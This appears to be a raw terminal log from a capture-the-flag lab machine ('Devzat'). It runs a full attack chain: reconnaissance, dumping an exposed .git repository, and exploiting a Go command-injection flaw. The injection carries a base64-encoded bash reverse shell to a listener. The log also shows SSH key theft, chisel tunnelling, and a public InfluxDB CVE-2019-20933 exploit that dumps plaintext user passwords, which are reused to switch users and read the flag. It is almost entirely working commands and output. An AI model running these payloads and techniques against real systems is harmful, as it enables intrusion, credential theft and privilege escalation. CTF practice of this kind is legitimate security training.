$ nmap -p- -T4 -A 10.129.219.228
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-16 18:24 EDT
Nmap scan report for 10.129.219.228
Host is up (0.030s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
| 256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_ 256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://devzat.htb/
8000/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-Go
| ssh-hostkey:
|_ 3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.91%I=7%D=10/16%Time=616B512E%P=x86_64-pc-linux-gnu%r(N
SF:ULL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.46 seconds
ssh -l [patrick] devzat.htb -p 8000
c: /help
[SYSTEM] Welcome to Devzat! Devzat is chat over SSH: github.com/quackduck/devzat
[SYSTEM] Because there's SSH apps on all platforms, even on mobile, you can join from anywhere.
[SYSTEM]
[SYSTEM] Interesting features:
[SYSTEM] • Many, many commands. Run /commands.
[SYSTEM] • Rooms! Run /room to see all rooms and use /room #foo to join a new room.
[SYSTEM] • Markdown support! Tables, headers, italics and everything. Just use in place of newlines.
[SYSTEM] • Code syntax highlighting. Use Markdown fences to send code. Run /example-code to see an example.
[SYSTEM] • Direct messages! Send a quick DM using =user <msg> or stay in DMs by running /room @user.
[SYSTEM] • Timezone support, use /tz Continent/City to set your timezone.
[SYSTEM] • Built in Tic Tac Toe and Hangman! Run /tic or /hang <word> to start new games.
[SYSTEM] • Emoji replacements! (like on Slack and Discord)
[SYSTEM]
[SYSTEM] For replacing newlines, I often use bulkseotools.com/add-remove-line-breaks.php.
[SYSTEM]
[SYSTEM] Made by Ishan Goel with feature ideas from friends.
[SYSTEM] Thanks to Caleb Denio for lending his server!
[SYSTEM]
[SYSTEM] For a list of commands run
[SYSTEM] ┃ /commands
2 minutes in
c: /commands
[SYSTEM] Commands
[SYSTEM] clear - Clears your terminal
[SYSTEM] message - Sends a private message to someone
[SYSTEM] users - Gets a list of the active users
[SYSTEM] all - Gets a list of all users who has ever connected
[SYSTEM] exit - Kicks you out of the chat incase your client was bugged
[SYSTEM] bell - Toggles notifications when you get pinged
[SYSTEM] room - Changes which room you are currently in
[SYSTEM] id - Gets the hashed IP of the user
[SYSTEM] commands - Get a list of commands
[SYSTEM] nick - Change your display name
[SYSTEM] color - Change your display name color
[SYSTEM] timezone - Change how you view time
[SYSTEM] emojis - Get a list of emojis you can use
[SYSTEM] help - Get generic info about the server
[SYSTEM] tictactoe - Play tictactoe
[SYSTEM] hangman - Play hangman
[SYSTEM] shrug - Drops a shrug emoji
[SYSTEM] ascii-art - Bob ross with text
[SYSTEM] example-code - Hello world!
$ ffuf -c -u http://devzat.htb -H "Host: FUZZ.devzat.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200
pets [Status: 200, Size: 510, Words: 20, Lines: 21]
:: Progress: [4989/4989] :: Job [1/1] :: 1219 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
$ gobuster -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt vhost -u http://devzat.htb -o subdomain_devzat.txt
$ cat subdomain_devzat.txt | grep "Status: 200"
Found: pets.devzat.htb (Status: 200) [Size: 510]
$ dirb http://pets.devzat.htb
---- Scanning URL: http://pets.devzat.htb/ ----
+ http://pets.devzat.htb/.git/HEAD (CODE:200|SIZE:23)
+ http://pets.devzat.htb/build (CODE:301|SIZE:42)
+ http://pets.devzat.htb/css (CODE:301|SIZE:40)
+ http://pets.devzat.htb/server-status (CODE:403|SIZE:280)
$ ffuf -u http://pets.devzat.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -fs 510
css [Status: 301, Size: 40, Words: 3, Lines: 3]
build [Status: 301, Size: 42, Words: 3, Lines: 3]
server-status [Status: 403, Size: 280, Words: 20, Lines: 10]
.git [Status: 301, Size: 41, Words: 3, Lines: 3]
:: Progress: [43003/43003] :: Job [1/1] :: 1138 req/sec :: Duration: [0:00:41] :: Errors: 0 :
gobuster dir -u http://pets.devzat.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Error: the server returns a status code that matches the provided options for non existing urls. http://pets.devzat.htb/dae12bd4-709f-4b81-b9eb-297c8e0d1bfd => 200 (Length: 510). To continue please exclude the status code, the length or use the --wildcard switch
/home/kali/0.htb/gitTools-v0.0.1/Dumper/gitdumper.sh http://pets.devzat.htb/.git/ pets
/home/kali/.local/bin/githacker --url http://pets.devzat.htb --folder pets-devzat-result
$ cat main.go
func loadCharacter(species string) string {
cmd := exec.Command("sh", "-c", "cat characteristics/"+species)
stdoutStderr, err := cmd.CombinedOutput()
if err != nil {
return err.Error()
}
return string(stdoutStderr)
}
$ sudo tcpdump -i tun0 icmp
burp suite
POST /api/pet HTTP/1.1
Host: pets.devzat.htb
Content-Length: 35
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://pets.devzat.htb
Referer: http://pets.devzat.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"name":"cpt; ping -c 10.10.14.52"}
kali@kali:~/0.htb/release_arena/devzat/$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:02:41.271072 IP devzat.htb > kali: ICMP echo request, id 1, seq 43, length 64
14:02:41.271098 IP kali > devzat.htb: ICMP echo reply, id 1, seq 43, length 64
$ echo 'bash -i >& /dev/tcp/10.10.14.52/4444 0>&1' |base64
YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNTIvNDQ0NCAwPiYxCg==
kali@kali:~/0.htb/release_arena/devzat10.129.219.228$ nc -lvnp 4444
listening on [any] 4444 ...
{"name":"Test","species":"`echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNTIvNDQ0NCAwPiYxCg==|base64 -d|bash`"}
POST /api/pet HTTP/1.1
Host: pets.devzat.htb
Content-Length: 110
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: http://pets.devzat.htb
Referer: http://pets.devzat.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"name":"Test","species":"`echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNTIvNDQ0NCAwPiYxCg==|base64 -d|bash`"}
kali@kali:~/0.htb/release_arena/devzat10.129.219.228$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.52] from (UNKNOWN) [10.129.220.90] 37144
bash: cannot set terminal process group (924): Inappropriate ioctl for device
bash: no job control in this shell
patrick@devzat:~/pets$ id
id
uid=1000(patrick) gid=1000(patrick) groups=1000(patrick)
patrick@devzat:/home/catherine$ ll
ll
total 32
drwxr-xr-x 4 catherine catherine 4096 Sep 21 19:35 ./
drwxr-xr-x 4 root root 4096 Jun 22 18:26 ../
lrwxrwxrwx 1 root root 9 Jun 22 20:41 .bash_history -> /dev/null
-rw-r--r-- 1 catherine catherine 220 Jun 22 18:26 .bash_logout
-rw-r--r-- 1 catherine catherine 3808 Jun 22 18:44 .bashrc
drwx------ 2 catherine catherine 4096 Sep 21 19:35 .cache/
-rw-r--r-- 1 catherine catherine 807 Jun 22 18:26 .profile
drwx------ 2 catherine catherine 4096 Sep 29 16:31 .ssh/
-r-------- 1 catherine catherine 33 Oct 16 20:20 user.txt
patrick@devzat:/home/catherine$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
patrick@devzat:/home/catherine$
##transfer linpeas.sh to devzat.htb
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
patrick@devzat:~$ wget http://10.10.14.52:8000/linpeas.sh
##copy patrick .ssh/id_rsa and $ chmod 600 id_rsa
kali@kali:~/0.htb/release_arena/devzat$ ssh -i id_rsa patrick@10.129.220.90
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
patrick@devzat:~$
$ linpeas -a > /dev/shm/linpeas.txt
$ less -r /dev/shm/linpeas.txt
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN 933/./petshop
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8086 0.0.0.0:* LISTEN -
port forward
$ chisel server -p 8090 --reverse
2021/10/17 16:42:34 server: Reverse tunnelling enabled
2021/10/17 16:42:34 server: Fingerprint mWKeAKn1u+Y8kxLgCPA6t7IT3rwY6syif6VdRm/uj20=
2021/10/17 16:42:34 server: Listening on http://0.0.0.0:8090
patrick@devzat:~$ ./chisel client 10.10.14.52:8090 R:8086:127.0.0.1:8086
2021/10/17 20:47:05 client: Connecting to ws://10.10.14.52:8090
2021/10/17 20:47:05 client: Connected (Latency 31.719208ms)
kali@kali:~/0.htb/release_arena/devzat$ nmap -p 8086 -sV 127.0.0.1
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-17 16:48 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00014s latency).
PORT STATE SERVICE VERSION
8086/tcp open http InfluxDB http admin 1.7.5
GitHub - LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933: InfluxDB CVE-2019-20933 vulnerability exploit
$ git clone https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933.git
$ cd InfluxDB-Exploit-CVE-2019-20933
$ pip install -r requirements.txt
$ python3 __main__.py
Insert ip host (default localhost):
Insert port (default 8086):
Insert influxdb user (wordlist path to bruteforce username): /usr/share/seclists/Usernames/Names/names.txt
Start username bruteforce
Host vulnerable !!!
Databases list:
1) devzat
2) _internal
Insert database name (exit to close): devzat
[devzat] Insert query (exit to change db): SELECT * FROM "user"
{
"results": [
{
"series": [
{
"columns": [
"time",
"enabled",
"password",
"username"
],
"name": "user",
"values": [
[
"2021-06-22T20:04:16.313965493Z",
false,
"WillyWonka2021",
"wilhelm"
],
[
"2021-06-22T20:04:16.320782034Z",
true,
"woBeeYareedahc7Oogeephies7Aiseci",
"catherine"
],
[
"2021-06-22T20:04:16.996682002Z",
true,
"RoyalQueenBee$",
"charles"
]
]
}
],
"statement_id": 0
}
]
}
[devzat] Insert query (exit to change db):
patrick@devzat:~$ su catherine
Password:
catherine@devzat:/home/patrick$ id
uid=1001(catherine) gid=1001(catherine) groups=1001(catherine)
catherine@devzat:/home/patrick$ cd ..
catherine@devzat:/home$ cd catherine/
catherine@devzat:~$ ll
total 32
drwxr-xr-x 4 catherine catherine 4096 Sep 21 19:35 ./
drwxr-xr-x 4 root root 4096 Jun 22 18:26 ../
lrwxrwxrwx 1 root root 9 Jun 22 20:41 .bash_history -> /dev/null
-rw-r--r-- 1 catherine catherine 220 Jun 22 18:26 .bash_logout
-rw-r--r-- 1 catherine catherine 3808 Jun 22 18:44 .bashrc
drwx------ 2 catherine catherine 4096 Sep 21 19:35 .cache/
-rw-r--r-- 1 catherine catherine 807 Jun 22 18:26 .profile
drwx------ 2 catherine catherine 4096 Sep 29 16:31 .ssh/
-r-------- 1 catherine catherine 33 Oct 16 20:20 user.txt
catherine@devzat:~$ cat user.txt
0407698dbdc34a436676297b5f6b1c9f
catherine@devzat:~$